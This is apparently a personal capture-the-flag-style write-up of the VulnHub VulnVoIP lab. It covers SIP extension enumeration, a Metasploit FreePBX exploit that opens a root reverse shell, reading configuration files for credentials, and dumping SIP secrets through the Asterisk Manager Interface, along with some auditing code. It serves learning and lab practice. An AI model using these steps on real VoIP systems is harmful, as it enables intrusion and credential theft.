Core dump overflow


Pentest lab - VulnVoIP


I found a very interesting virtual machine on VulnHub that focuses on VoIP vulnerabilities. Since I haven’t seen any other VoIP resources, I thought it would be great to give this a try.

VulnVoIP is based on a relatively old AsteriskNOW distribution and has a number of weaknesses. The aim is to locate VoIP users, crack their passwords and gain access to the Support account voicemail.

The IP of the target machine is 192.168.80.131. Here are the results of the port scan:

nmap -A -p1-65535 192.168.80.131

Starting Nmap 6.47 ( http://nmap.org ) at 2014-10-07 19:45 EEST
Nmap scan report for 192.168.80.131
Host is up (0.00023s latency).
Not shown: 65527 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 1f:e2:e8:9e:2c:f8:31:39:36:f7:1d:aa:77:5e:ac:76 (DSA)
|_  2048 38:a4:9d:29:8a:11:9d:e1:13:5d:5e:6d:76:a6:63:76 (RSA)
53/tcp   open  domain     dnsmasq 2.45
| dns-nsid: 
|_  bind.version: dnsmasq-2.45
80/tcp   open  http       Apache httpd 2.2.3 ((CentOS))
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: FreePBX
111/tcp  open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            966/udp  status
|_  100024  1            969/tcp  status
969/tcp  open  status     1 (RPC #100024)
3306/tcp open  mysql      MySQL (unauthorized)
4445/tcp open  upnotifyp?
5038/tcp open  asterisk   Asterisk Call Manager 1.1
MAC Address: 00:0C:29:84:8C:CC (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.18 - 2.6.32

Let’s look at that DNS server first:

dnsmasq is a lightweight DNS, TFTP and DHCP server. It is intended to provide coupled DNS and DHCP service to a LAN.

Dnsmasq accepts DNS queries and either answers them from a small, local, cache or forwards them to a real, recursive, DNS server. It loads the contents of /etc/hosts so that local hostnames which do not appear in the global DNS can be resolved and also answers DNS queries for DHCP configured hosts.

The dnsmasq DHCP server supports static address assignments and multiple networks. It automatically sends a sensible default set of DHCP options, and can be configured to send any desired set of DHCP options, including vendor-encapsulated options. It includes a secure, read-only, TFTP server to allow net/PXE boot of DHCP hosts and also supports BOOTP.

Dnsmasq supports IPv6 for DNS, but not DHCP.

There is a Heap Overflow and Null-pointer Dereference vulnerability affecting the TFTP server component:

CVE-2009-2957

A vulnerability has been found that may allow an attacker to execute arbitrary code on servers or home routers running dnsmasq with the TFTP service enabled (‘--enable-tftp’). This service is not enabled by default on most distributions; in particular it is not enabled by default on OpenWRT or DD-WRT. Chances of successful exploitation increase when a long directory prefix is used for TFTP. Code will be executed with the privileges of the user running dnsmasq, which is normally a non-privileged one.

Additionally there is a potential DoS attack to the TFTP service by exploiting a null-pointer dereference vulnerability.

I wasn’t able to exploit this though, so moving on.

Navigating to the web page, we see two links, for Voicemail & Recordings (ARI) and FreePBX Administration. The administration page requires HTTP authentication, and the other one is a login portal.

A Nessus scan revealed that the Asterisk Recording Interface uses a default set of credentials for the administrator’s account: admin/ari_password, on the URL http://192.168.80.131/recordings/index.php . I didn’t find anything useful even after logging in. These credentials didn’t work on the admin page at http://192.168.80.131/admin/config.php , but I was able to glean the FreePBX version from the webpage (2.7.0.0). Might come in handy later!

Since this is my first time doing anything remotely related to VoIP, I had some googling and reading to do. For a while I just digressed from the main goal of hacking this machine to burying myself in the Session Initiation Protocol RFC (ouch!), and 2 books: Hacking Exposed VoIP: Voice Over IP Security Secrets & Solutions and Hacking VoIP: Protocols, Attacks, and Countermeasures.

So, a short introduction to SIP is in order:

SIP is an application-layer control protocol that can establish, modify, and terminate multimedia sessions (conferences) such as Internet telephony calls. SIP can also invite participants to already existing sessions, such as multicast conferences.

SIP employs design elements similar to the HTTP request/response transaction model. Each transaction consists of a client request that invokes a particular method or function on the server and at least one response. SIP reuses most of the header fields, encoding rules and status codes of HTTP, providing a readable text-based format.

Each resource of a SIP network, such as a user agent or a voicemail box, is identified by a URI, based on the general standard syntax also used in Web services and e-mail. The URI scheme used for SIP is sip: and a typical SIP URI is of the form: sip:username:password@host:port

SIP clients typically use TCP or UDP on port numbers 5060 and/or 5061 to connect to SIP servers and other SIP endpoints. Port 5060 is commonly used for non-encrypted signaling traffic whereas port 5061 is typically used for traffic encrypted with TLS. SIP is primarily used in setting up and tearing down voice or video calls.

SIP Requests

  • INVITE – A client is being invited to participate in a call.

  • ACK – The client has confirmed the INVITE request.

  • BYE – The call has been terminated by either the caller or callee.

  • CANCEL – Cancel any pending requests.

  • OPTIONS – Queries the server for its capabilities.

  • REGISTER – Registers the client with the server according to the address in the To header.

  • PRACK – Similar to ACK, but a provisional confirmation.

  • SUBSCRIBE – Subscribes the device for an event notification.

  • NOTIFY – Notifies all subscribers of an event.

  • PUBLISH – Publishes an event to a server.

  • INFO – Sends information in the middle of a session that doesn’t modify the session’s state.

  • REFER – Asks the client to issue a SIP request, typically a call transfer.

  • MESSAGE – Sends an instant message using SIP.

  • UPDATE – Modifies a session’s state without altering the dialog state.

And, a little about Asterisk and FreePBX:

Asterisk is a software implementation of a telephone private branch exchange (PBX). Like any PBX, it allows attached telephones to make calls to one another, and to connect to other telephone services, such as the public switched telephone network (PSTN) and Voice over Internet Protocol (VoIP) services.

FreePBX is an open source GUI that controls and manages Asterisk.

I found an awesome tool suite for this challenge: SIPVicious

SIPVicious suite is a set of tools that can be used to audit SIP based VoIP systems. It currently consists of the following tools:

svmap – this is a sip scanner. Lists SIP devices found on an IP range

svwar – identifies active extensions on a PBX

svcrack – an online password cracker for SIP PBX

svreport – manages sessions and exports reports to various formats

svcrash – attempts to stop unauthorized svwar and svcrack scans

Let’s get started then!

./svmap.py 192.168.80.1/24
| SIP Device          | User Agent            | Fingerprint |
-------------------------------------------------------------
| 192.168.80.131:5060 | Asterisk PBX 1.6.2.11 | disabled    |

Now we also have the Asterisk version. Next, we need to find valid extensions (it took a while of trial and error to get meaningful information on this one):

./svwar.py -D -m INVITE 192.168.80.131
WARNING:TakeASip:using an INVITE scan on an endpoint (i.e. SIP phone) may cause it to ring and wake up people in the middle of the night
WARNING:TakeASip:extension '100' probably exists but the response is unexpected
WARNING:TakeASip:extension '100' probably exists but the response is unexpected
| Extension | Authentication |
------------------------------
| 201       | reqauth        |
| 200       | reqauth        |
| 2000      | reqauth        |
| 102       | reqauth        |
| 100       | weird          |
| 101       | reqauth        |

The -D option enables scanning for default extensions, and the -m option specifies a request method (INVITE indicates that a client is being invited to participate in a call session.)
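As an added example (not code from the original post or from SIPVicious), here is a small parser for the HTTP-style SIP messages described above, with a classifier whose labels are modelled on the Authentication column svwar printed: reqauth for a 401/407 challenge, noauth for a 200 without one, weird for anything else. The sample responses are constructed, not captured from the lab.

```python
import re

# Constructed sample responses: a digest challenge to an INVITE for
# extension 201, and a bare provisional reply.
SAMPLE_401 = (
    "SIP/2.0 401 Unauthorized\r\n"
    "Via: SIP/2.0/UDP 192.168.80.130:5060;branch=z9hG4bK-1\r\n"
    "From: <sip:201@192.168.80.131>;tag=f1\r\n"
    "To: <sip:201@192.168.80.131>;tag=as1f2e\r\n"
    "Call-ID: 1@192.168.80.130\r\n"
    "CSeq: 1 INVITE\r\n"
    'WWW-Authenticate: Digest algorithm=MD5, realm="asterisk", nonce="2b7c"\r\n'
    "Content-Length: 0\r\n\r\n"
)
SAMPLE_100 = "SIP/2.0 100 Trying\r\nCSeq: 1 INVITE\r\nContent-Length: 0\r\n\r\n"

STATUS_RE = re.compile(r"^SIP/2\.0 (\d{3}) (.*)$")

def parse_sip(raw):
    """Split a SIP message the HTTP way: start line, header dict, body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def classify(raw):
    """Label an INVITE response: reqauth = challenged (401/407),
    noauth = accepted without a challenge, weird = anything else
    (for instance only a provisional 1xx reply)."""
    start, headers, _ = parse_sip(raw)
    m = STATUS_RE.match(start)
    if not m:
        return "weird"
    code = int(m.group(1))
    if code in (401, 407) and ("www-authenticate" in headers or "proxy-authenticate" in headers):
        return "reqauth"
    if code == 200:
        return "noauth"
    return "weird"

def digest_realm(raw):
    """Extract the realm from the challenge. Asterisk's default realm is
    the string 'asterisk', which tells a scanner what PBX it is talking to."""
    _, headers, _ = parse_sip(raw)
    m = re.search(r'realm="([^"]*)"', headers.get("www-authenticate", ""))
    return m.group(1) if m else None
```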

If you read the VM description on VulnHub, you probably remember that it mentions an easy way to get root to the machine. I found an exploit for that in Metasploit, more info here: http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/

use exploit/unix/http/freepbx_callmenum

msf exploit(freepbx_callmenum) > show options

Module options (exploit/unix/http/freepbx_callmenum):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   EXTENSION  2000-2001        yes       A range of Local extension numbers
   Proxies                     no        Use a proxy chain
   RHOST      192.168.80.131   yes       The target address
   RPORT      80               yes       The target port
   VHOST                       no        HTTP server virtual host


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.80.130   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

I specified the extension to match one of those that we previously discovered. And the machine belongs to us now!

msf exploit(freepbx_callmenum) > exploit

[*] Started reverse handler on 192.168.80.130:4444 
[*] 192.168.80.131:80 - Sending evil request with range 2000
[*] 192.168.80.131:80 - Sending evil request with range 2001
[*] Command shell session 1 opened (192.168.80.130:4444 -> 192.168.80.131:47268) at 2014-10-14 14:42:29 +0300

whoami
root

But we are not done. We still have to find the usernames and passwords, and get the voicemail from the Support account. I googled a bit for a helpful configuration file, which turned out to be the amportal.conf file:

cat /etc/amportal.conf
# This file is part of FreePBX.
#
#    FreePBX is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 2 of the License, or
#    (at your option) any later version.
#
#    FreePBX is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License
#    along with FreePBX.  If not, see <http://www.gnu.org/licenses/>.
#
# This file contains settings for components of the Asterisk Management Portal
# Spaces are not allowed!
# Run /usr/src/AMP/apply_conf.sh after making changes to this file

# AMPDBHOST: the host to connect to the database named 'asterisk'
AMPDBHOST=localhost

# AMPDBUSER: the user to connect to the database named 'asterisk'
AMPDBUSER=freepbx

# AMPDBENGINE: the type of database to use
AMPDBENGINE=mysql

# AMPDBPASS: the password for AMPDBUSER
AMPDBPASS=fpbx

# AMPENGINE: the telephony backend engine to use
AMPENGINE=asterisk

# AMPMGRUSER: the user to access the Asterisk manager interface
AMPMGRUSER=admin

# AMPMGRPASS: the password for AMPMGRUSER
AMPMGRPASS=amp111
..............................................
# AUTHTYPE: authentication type to use for web admin
# If type set to 'database', the primary AMP admin credentials will be the AMPDBUSER/AMPDBPASS above
# valid: none, database
AUTHTYPE=database

We have the username and password for the admin interface now.

[screenshot: FreePBX web admin interface]

If we go to Panel, we can see that 2000 is the extension for the Support account. But I still couldn’t find a way to actually listen to the voicemail message, and I don’t have the password. However, I also have the credentials for the Asterisk Manager Interface (the “Asterisk Call Manager” on port 5038), so let’s see if that helps. To log in and authenticate to the manager, you must send a “login” action with your username and secret (password) as parameters. We can use telnet for this (don’t forget to hit Enter twice after entering the parameters):

telnet 192.168.80.131 5038
Trying 192.168.80.131...
Connected to 192.168.80.131.
Escape character is '^]'.
Asterisk Call Manager/1.1
action: login
username: admin
secret: amp111

Response: Success
Message: Authentication accepted

For a comprehensive list of Asterisk commands, check out this Asterisk CLI resource and Manager Actions. To list the SIP users, we have to use a “command” action this time. And then specify the command, which is sip show users:

action: command
command: sip show users

Response: Follows
Privilege: Command
Username                   Secret           Accountcode      Def.Context      ACL  NAT       
100                                                          from-internal    Yes  Always    
101                        s3cur3                            from-internal    Yes  Always    
102                        letmein123                        from-internal    Yes  Always    
201                        secret123                         from-internal    Yes  Always    
200                        quit3s3curE123                    from-internal    Yes  Always    
2000                       password123                       from-internal    Yes  Always    
--END COMMAND--
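The manager exchange above (the login action and the “sip show users” command) as an added example, not code from the original post or from Asterisk: the client side frames an action as “Key: value” lines ending with a blank line, the server side replies in packets of the same shape, and a “Response: Follows” packet carries CLI output up to the --END COMMAND-- marker. The audit function then slices the fixed-width user table and flags extensions with no secret or a weak one; the length threshold is an assumption made for this example.

```python
import re

WEAK_MIN_LEN = 8  # threshold chosen for this example, not an Asterisk setting
HEADER_RE = re.compile(r"^([A-Za-z-]+): ?(.*)$")

def encode_action(action, **fields):
    """Frame an AMI action exactly as typed into telnet above:
    'Key: value' lines, terminated by an empty line."""
    lines = [f"Action: {action}"] + [f"{k}: {v}" for k, v in fields.items()]
    return "\r\n".join(lines) + "\r\n\r\n"

def parse_packet(text):
    """Parse one AMI reply into (headers, output_lines); CLI output of a
    'Response: Follows' reply runs until the --END COMMAND-- marker."""
    headers, output, in_output = {}, [], False
    for line in text.splitlines():
        if line == "--END COMMAND--":
            break
        m = None if in_output else HEADER_RE.match(line)
        if m:
            headers[m.group(1)] = m.group(2)
        elif line.strip():
            in_output = True
            output.append(line)
    return headers, output

def audit_sip_users(output):
    """Slice the fixed-width 'sip show users' table at the header's column
    offsets; return {username: finding} for empty or weak secrets."""
    header = output[0]
    s, a = header.index("Secret"), header.index("Accountcode")
    findings = {}
    for row in output[1:]:
        user, secret = row[:s].strip(), row[s:a].strip()
        if not secret:
            findings[user] = "no secret"
        elif len(secret) < WEAK_MIN_LEN or secret.lower().startswith("password"):
            findings[user] = "weak secret"
    return findings

# Server replies copied from the session above (login reply, then a
# shortened 'sip show users' table).
SAMPLE_LOGIN_OK = "Response: Success\r\nMessage: Authentication accepted\r\n\r\n"
SAMPLE_FOLLOWS = (
    "Response: Follows\r\nPrivilege: Command\r\n"
    "Username                   Secret           Accountcode      Def.Context      ACL  NAT       \r\n"
    "100                                                          from-internal    Yes  Always    \r\n"
    "101                        s3cur3                            from-internal    Yes  Always    \r\n"
    "2000                       password123                       from-internal    Yes  Always    \r\n"
    "--END COMMAND--\r\n\r\n"
)
```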

And it was this easy to get the usernames and passwords! I should have started with that! Now it’s possible to dial the extension and listen to the voicemail message. I just randomly chose Jitsi as a VoIP client for this task. You have to download and install the package file:

wget https://download.jitsi.org/jitsi/debian/jitsi_2.5-latest_amd64.deb
dpkg -i jitsi_2.5-latest_amd64.deb

Next, create an account in Jitsi:

[screenshot: Jitsi account setup]

However, when you make the call, it asks for a voicemail password! I went back to my shell on the machine and to googling about Asterisk voicemail passwords. The configuration file that comes to the rescue is /etc/asterisk/voicemail.conf.

cat /etc/asterisk/voicemail.conf
[general]
#include vm_general.inc
#include vm_email.inc
[default]

2000 => 0000,Support,,,attach=no|saycid=no|envelope=no|delete=no
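As an added example (not code from the original post or from Asterisk), here is a parser for the mailbox lines of voicemail.conf, which follow the form “mailbox => pin,name,email,pager,options”, together with a check that flags PINs like the 0000 above (too short, all one digit, a digit run, or equal to the mailbox number). The 2001 line in the sample is constructed; only the 2000 line comes from the post.

```python
import re

SAMPLE_CONF = """[general]
#include vm_general.inc
#include vm_email.inc
[default]
2000 => 0000,Support,,,attach=no|saycid=no|envelope=no|delete=no
2001 => 7391,Mark,mark@example.invalid,,attach=yes   ; constructed entry
"""

MAILBOX_RE = re.compile(r"^\s*(\d+)\s*=>\s*(.*)$")

def parse_voicemail_conf(text):
    """Return [(context, mailbox, pin, name, options_dict)] for every
    mailbox line; '#include' lines and ';' comments are skipped."""
    context, boxes = None, []
    for line in text.splitlines():
        line = line.split(";", 1)[0].rstrip()
        if not line or line.startswith("#include"):
            continue
        if line.startswith("[") and line.endswith("]"):
            context = line[1:-1]
            continue
        m = MAILBOX_RE.match(line)
        if not m:
            continue
        fields = m.group(2).split(",")
        fields += [""] * (5 - len(fields))
        pin, name, _email, _pager, opts = fields[:5]
        options = dict(o.split("=", 1) for o in opts.split("|") if "=" in o)
        boxes.append((context, m.group(1), pin.strip(), name.strip(), options))
    return boxes

def weak_pin(pin, mailbox):
    """A PIN is weak if short, equal to the mailbox number, all one digit,
    or a strictly ascending/descending digit run such as 1234."""
    if len(pin) < 4 or pin == mailbox or len(set(pin)) == 1:
        return True
    digits = [int(c) for c in pin]
    steps = {b - a for a, b in zip(digits, digits[1:])}
    return steps in ({1}, {-1})

def audit_voicemail(text):
    """Map each mailbox with a weak PIN to that PIN."""
    return {box: pin for _, box, pin, _, _ in parse_voicemail_conf(text) if weak_pin(pin, box)}
```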

So, the password is 0000, and we can now listen to the message, which I’ll type here for the sake of completeness (hope I got it right):

“Hey Mark, I think the support web access account has been compromised. I have changed the password to securesupport123, all one word in lowercase. You can log on at the usual address. See you in the morning”

Well, I really liked this challenge! It made me read up about various subjects I wasn’t familiar with, like Asterisk and SIP. I also discovered the SIPVicious suite, which should come in handy from now on. And it was a great feeling to finally hear the message at the end. Also, VoIP hacking is a very interesting topic, and I hope there will be more chances to practice and learn about it.
